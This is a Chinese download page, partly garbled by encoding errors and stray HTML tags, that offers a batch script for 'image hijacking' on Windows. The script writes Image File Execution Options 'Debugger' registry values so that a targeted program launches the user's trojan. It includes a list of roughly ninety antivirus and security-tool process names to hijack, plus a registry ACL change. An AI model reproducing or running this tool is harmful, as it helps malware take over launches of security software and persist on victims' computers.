Windows映像劫持利用程序bat版

投訴報錯

BAT大?。?span>8KB
BAT語言：簡體中文
BAT類型：國產(chǎn)軟件
BAT授權(quán)：免費軟件
BAT類別：安全防毒
應(yīng)用平臺：Windows平臺
更新時間：2014-05-02
網(wǎng)友評分：

360通過騰訊通過金山通過

8KB

詳情介紹

NT系統(tǒng)在試圖執(zhí)行一個從命令行調(diào)用的可執(zhí)行文件運行請求時，先會檢查運行程序是不是可執(zhí)行文件，如果是的話，再檢查格式的，然后就會檢查是否存在。。如果不存在的話，它會提示系統(tǒng)找不到文件或者是“指定的路徑不正確等等。

復(fù)制代碼

代碼如下:

@shift 1
@Echo Off
color f0
title Windows映像劫持利用程序-By Mice
:clearauto
cls
Echo.
Echo Windows映像劫持利用程序
Echo.
Echo 制作：Mice <a >Http://WwW.Mice33.Cn</a>
Echo.
Echo 映像脅持的基本原理:
Echo NT系統(tǒng)在試圖執(zhí)行一個從命令行調(diào)用的可執(zhí)行文件運行請求時，先會檢查運行程序是不是可執(zhí)行文件，如果是的話，再檢查格式的，然后就會檢查是否存在。。如果不存在的話，它會提示系統(tǒng)找不到文件或者是“指定的路徑不正確等等。。
Echo.
Echo [1] 哈哈我來利用咯
Echo [2] 看看常用殺毒軟件進程名稱
Echo [3] 修補漏洞
Echo [0] 退出
Echo.
Set /p clearslt= 請輸入您的選擇(1/2/3/0):
If "%clearslt%"=="" Goto clearauto
If "%clearslt%"=="1" Goto clearauto1
If "%clearslt%"=="2" Goto changyong
If "%clearslt%"=="3" Goto budong
If "%clearslt%"=="0" Exit
echo 請選擇編號
pause
Goto clearauto <span style="TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; DISPLAY: inline !important; FONT: 14px/21px 宋體; WHITE-SPACE: normal; FLOAT: none; LETTER-SPACING: normal; COLOR: rgb(0,0,0); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px">:clearauto1
rem 定義文件名
set /p file1= 請輸入你要挾持的文件名(如avp.exe,rav,exe)
set /p file2= 請輸入你木馬的絕對路徑(如c:\windows\xx.exe)
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%file1%] >mice.reg
regedit /s mice.reg & del /q mice.reg <span style="TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; DISPLAY: inline !important; FONT: 14px/21px 宋體; WHITE-SPACE: normal; FLOAT: none; LETTER-SPACING: normal; COLOR: rgb(0,0,0); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px">reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%file1%" /f /v "Debugger" /t reg_sz /d "%file2%"
del /q cy.txt
cls
Echo 添加成功.趕快把文件名改成%file1%來測試下吧.
pause>nul
Goto clearauto <span style="TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; DISPLAY: inline !important; FONT: 14px/21px 宋體; WHITE-SPACE: normal; FLOAT: none; LETTER-SPACING: normal; COLOR: rgb(0,0,0); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px">:changyong
rem 常用軟件名
echo 常用殺毒軟件 >>cy.txt
echo avp.exe >>cy.txt
echo AgentSvr.exe >>cy.txt
echo CCenter.exe>>cy.txt
echo Rav.exe>>cy.txt
echo RavMonD.exe>>cy.txt
echo RavStub.exe>>cy.txt
echo RavTask.exe>>cy.txt
echo rfwcfg.exe>>cy.txt
echo rfwsrv.exe>>cy.txt
echo RsAgent.exe>>cy.txt
echo Rsaupd.exe>>cy.txt
echo runiep.exe>>cy.txt
echo SmartUp.exe>>cy.txt
echo FileDsty.exe>>cy.txt
echo RegClean.exe>>cy.txt
echo 360tray.exe>>cy.txt
echo 360Safe.exe>>cy.txt
echo 360rpt.exe>>cy.txt
echo kabaload.exe>>cy.txt
echo safelive.exe>>cy.txt
echo Ras.exe>>cy.txt
echo KASMain.exe>>cy.txt
echo KASTask.exe>>cy.txt
echo KAV32.exe>>cy.txt
echo KAVDX.exe>>cy.txt
echo KAVStart.exe>>cy.txt
echo KISLnchr.exe>>cy.txt
echo KMailMon.exe>>cy.txt
echo KMFilter.exe>>cy.txt
echo KPFW32.exe>>cy.txt
echo KPFW32X.exe>>cy.txt
echo KPFWSvc.exe>>cy.txt
echo KWatch9x.exe>>cy.txt
echo KWatch.exe>>cy.txt
echo KWatchX.exe>>cy.txt
echo TrojanDetector.exe>>cy.txt
echo UpLive.EXE.exe>>cy.txt
echo KVSrvXP.exe>>cy.txt
echo KvDetect.exe>>cy.txt
echo KRegEx.exe>>cy.txt
echo kvol.exe>>cy.txt
echo kvolself.exe>>cy.txt
echo kvupload.exe>>cy.txt
echo kvwsc.exe>>cy.txt
echo UIHost.exe>>cy.txt
echo IceSword.exe>>cy.txt
echo iparmo.exe>>cy.txt
echo mmsk.exe>>cy.txt
echo adam.exe>>cy.txt
echo MagicSet.exe>>cy.txt
echo PFWLiveUpdate.exe>>cy.txt
echo SREng.exe>>cy.txt
echo WoptiClean.exe>>cy.txt
echo scan32.exe>>cy.txt
echo shcfg32.exe>>cy.txt
echo mcconsol.exe>>cy.txt
echo HijackThis.exe>>cy.txt
echo mmqczj.exe>>cy.txt
echo Trojanwall.exe>>cy.txt
echo FTCleanerShell.exe>>cy.txt
echo loaddll.exe>>cy.txt
echo rfwProxy.exe>>cy.txt
echo KsLoader.exe>>cy.txt
echo KvfwMcl.exe>>cy.txt
echo autoruns.exe>>cy.txt
echo AppSvc32.exe>>cy.txt
echo ccSvcHst.exe>>cy.txt
echo isPwdSvc.exe>>cy.txt
echo symlcsvc.exe>>cy.txt
echo nod32kui.exe>>cy.txt
echo avgrssvc.exe>>cy.txt
echo RfwMain.exe>>cy.txt
echo KAVPFW.exe>>cy.txt
echo Iparmor.exe>>cy.txt
echo nod32krn.exe>>cy.txt
echo PFW.exe>>cy.txt
echo RavMon.exe>>cy.txt
echo KAVSetup.exe>>cy.txt
echo NAVSetup.exe>>cy.txt
echo SysSafe.exe>>cy.txt
echo QHSET.exe>>cy.txt
echo zxsweep.exe>>cy.txt
echo AvMonitor.exe>>cy.txt
echo UmxCfg.exe>>cy.txt
echo UmxFwHlp.exe>>cy.txt
echo UmxPol.exe>>cy.txt
echo UmxAgent.exe>>cy.txt
echo UmxAttachment.exe>>cy.txt
call cy.txt
Goto clearauto <span style="TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; DISPLAY: inline !important; FONT: 14px/21px 宋體; WHITE-SPACE: normal; FLOAT: none; LETTER-SPACING: normal; COLOR: rgb(0,0,0); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px">:budong
setacl.exe "machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /registry /deny administrators /full
setacl.exe "machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /registry /deny system /full
Echo 修補成功.
pause>nul
Goto clearauto

警告：運行BAT源碼是一種危險的動作，如果你不熟悉，請不要嘗試！

映像劫持

下載地址

下載錯誤？【投訴報錯】